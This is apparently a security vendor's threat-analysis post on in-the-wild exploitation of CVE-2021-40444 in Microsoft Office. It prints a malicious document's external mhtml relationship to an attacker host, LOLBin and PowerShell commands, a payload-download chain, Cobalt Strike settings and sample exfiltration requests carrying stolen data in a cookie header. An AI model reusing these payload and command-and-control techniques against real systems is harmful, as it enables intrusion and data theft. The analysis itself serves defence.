Microsoft Office has long been a common attack vector, with abuse of its macro functionality a firm favorite of phishing and malspam attacks. These typically attempt to infect users through maliciously crafted Word or Excel files received as an attachment or as a download link via email. Macro-based attacks, however, require an extra social engineering step or two as such functionality has to be explicitly approved by the user on a per-document basis. CVE-2021-40444, however, is a Microsoft Office MSHTML Remote Code Execution Vulnerability that requires no macros and only a single approval to “display content”. Threat actors wasted no time in putting this zero day vulnerability to ill-use before Microsoft provided a fix in September’s Patch Tuesday. In this post, we provide a technical analysis of how this CVE is being exploited in the wild.
How Attackers Exploit CVE-2021-40444 In The Wild
A user who opens the malicious document will see a very short progress bar loading the remote content:
Once the remote content is downloaded, a normal Word document is displayed:
Looking at the .docx document relationships:
“http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject” Target=”mhtml:hxxp://pawevi[.]com/e32c8df2cf6b7a16/specify.html!x-usc:hxxp://pawevi[.]com/e32c8df2cf6b7a16/specify.html” TargetMode=”External”/>”
The “document.xml” contains an HTML file OLE object:
A snippet of the attacking code:
The attackers used a combination of old and new techniques. One of the old-school methods involved mhtml (side.html, help.html, specify.html, mountain.html) to load mime content (rfc: message/822), which is similar to an email message and allows the attackers to retrieve encapsulated payload files and avoid using traditional file downloads over the HTTP protocol.
This means that at least part of the payload will bypass most common web proxies, filtering and content validation systems.
Abusing LOLBins and Cobalt Strike with CVE-2021-40444
A classic characteristic of sophisticated attacks is the use of LOLBins (operating system built-in tools) to disguise the attack as normal system behavior. A well-known LOLBin is control.exe c:windowstasksfile.txt:evil.dll, which loads DLLs hidden inside an “Alternate Data Stream” (a file invisible to the Windows UI). The samples seen-to-date use this technique in combination with a .cpl extension and a “path traversal” to load a file written to disk by Microsoft Word.
This technique abuses Windows control panel control.exe to load the attackers championship.inf file. This file is typically dropped on disk at the following location:
The malware can resolve the relative path to that location as
The compilation date on observed samples was August 20, 2021, meaning this zero day exploit was in the wild at least 25 days before a patch was available.
The final payload is a Cobalt Strike Beacon DLL. Most observed samples communicate with a team server at /static-directory/media.gif and /static-directory/templates.gif to get the payload shellcode of type CobaltStrike_HTTPReverseShellcodex64.
Cobalt Strike Config:
“Remove 338 bytes from the beginning”,
“NetBIOS decode ‘A'”
“Proxy_Behavior”: “Use IE settings”,
The Cobalt Strike payload DLL was built using the Boost C++ framework and has lib_openssl (1.1.0f) statically compiled into it:
It downloads a remote shellcode:
The payload then uses WMI via COM (executed by the svchost.exe hosting RasMan [netsvcs]) to execute one of three built-in Windows apps:
On Windows 10, it’s usually wabmig.exe, the built-in “Windows Mail” application (%ProgramFiles%windows mailwabmig.exe). The payload DLL assumes SeDebugPrivilege and injects the shellcode into wabmig.exe. It then uses the same WMI process to run a PowerShell instance that deletes itself from the disk.
powershell -c “Sleep 5 ; Remove-Item -Path “C:Users…” -Force
WinWord.exe -> Control.exe -> rundll32.exe -> requests payload from hxxps://macuwuf[.]com/get_load (User Agent: “bumblebee”) -> svchost.exe (Remote Access Connection Manager, “svchost.exe -k netsvcs”) -> wmiprvse.exe (WMI) -> wabmig.exe (“Windows Mail”) -> Code Injection ->
Headers: (Host: microsoft.com Headers: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9) -> request “dodefoh[.]com/ml.html?dbprefix=false”
Host: microsoft.com Connection: close Cookie: HSID=qa4NarNdu0U3b92eKlbW78+/fox2qG9E/+DLkr/F8TZ2N3a+n3wlLc1Z/Z3cRoKi68NNajtE14NxgljBdE8Y1hHYU5Ix4JH3xIkib6AaM404V4CW3ztax68SJPOsiKpWUaE/D46n2EPLDF7ZDFdcUV/7p95zuv322d/2d988ktya1gq1
Host: microsoft.com Connection: close Cookie: HSID=Oq81LSBcgwKkbuXZuVfuqFy+RsvlqVcDbOHz1SzEyXHlNk75DH0dal5YxdpPR7rleMJ1LahF78Tig2CG504gkYLZa9Wi4amwV4gaKDMbC8qrVrjRTDpigDwTHLQ/iZIRwqAHSB2m4ARYDWaen1ZkFsz6n5ngu8WxSt7OMEw9qpsJ1zLy
powershell.exe -> delete payload dll
The wabmig.exe sends an average of 400 HTTP GET requests of +-1.05kb each, randomized between the two host names joxinu[.]com and dodefoh[.]com at /avatars, /ml.js?restart=false and /hr.html?dbprefix=false. It leaks info from the host using encrypted data wrapped in base64 in the HTTP Header “HSID”.
Environments that are not setup to scan GET requests at the gateway/proxy would possibly overlook this traffic, or not properly recognize it as anomalous or malicious.
In the exfiltration part, one of the servers is typically in Germany and the other one is in the US.
Responses to Microsoft’s Patch for CVE-2021-40444
Since the discovery of the first samples, several exploit document builders have been published. These allow pentesters, defenders, and also lower caliber attackers to create exploit docs leveraging this vulnerability.
On the latest patch Tuesday (Sep 14, 2021), Microsoft released a patch for the CVE-2021-40444 vulnerability. Following the release of the patch, Microsoft published its own analysis of the attack using this exploit.
Chinese security researcher sunglin from 404 Team of KnownSec has published a reverse engineering analysis of Microsoft’s patch which demonstrates how Microsoft implemented the fix, overwriting filenames containing a “/” with “”.
There are already new tricks being used in order to bypass signatures and static detections for this exploit, the first being in-the-wild samples found using XML Entity Encoding and also a technique which seems to bypass Windows authenticode signature checking for .cab files being larger than 1Gb.
On Sep 19, 2021, a new variant of this exploit was published. This new variant doesn’t require a .cab file for exploitation and instead uses a .wsf Windows script file to execute code. In addition, researchers have suggested connections between the threat actors and the Ryuk ransomware group, although the exact nature of the connection remains unclear.
Defending Against Exploitation of CVE-2021-40444
Despite the fact that Microsoft has patched the underlying vulnerability, many organizations remain vulnerable to this type of attack either through failing to update in a timely fashion or from new variants that don’t use a .cab file.
SentinelOne customers are protected against this and related attacks.
Targeted attacks exploiting CVE-2021-40444 have been seen in the wild and appear to be ongoing. Sectors including critical infrastructure like Energy, Finance, IT and Telecoms have all reportedly been targeted, among others. SentinelOne urges enterprise security teams to take appropriate measures to ensure they are protected against this attack vector. If you would like to know more about how SentinelOne can keep your business safe from this and other attacks, contact us for more information or request a free demo.
Indicators of Compromise
Word Document Samples
DLL/EXE Payloads (championship.inf)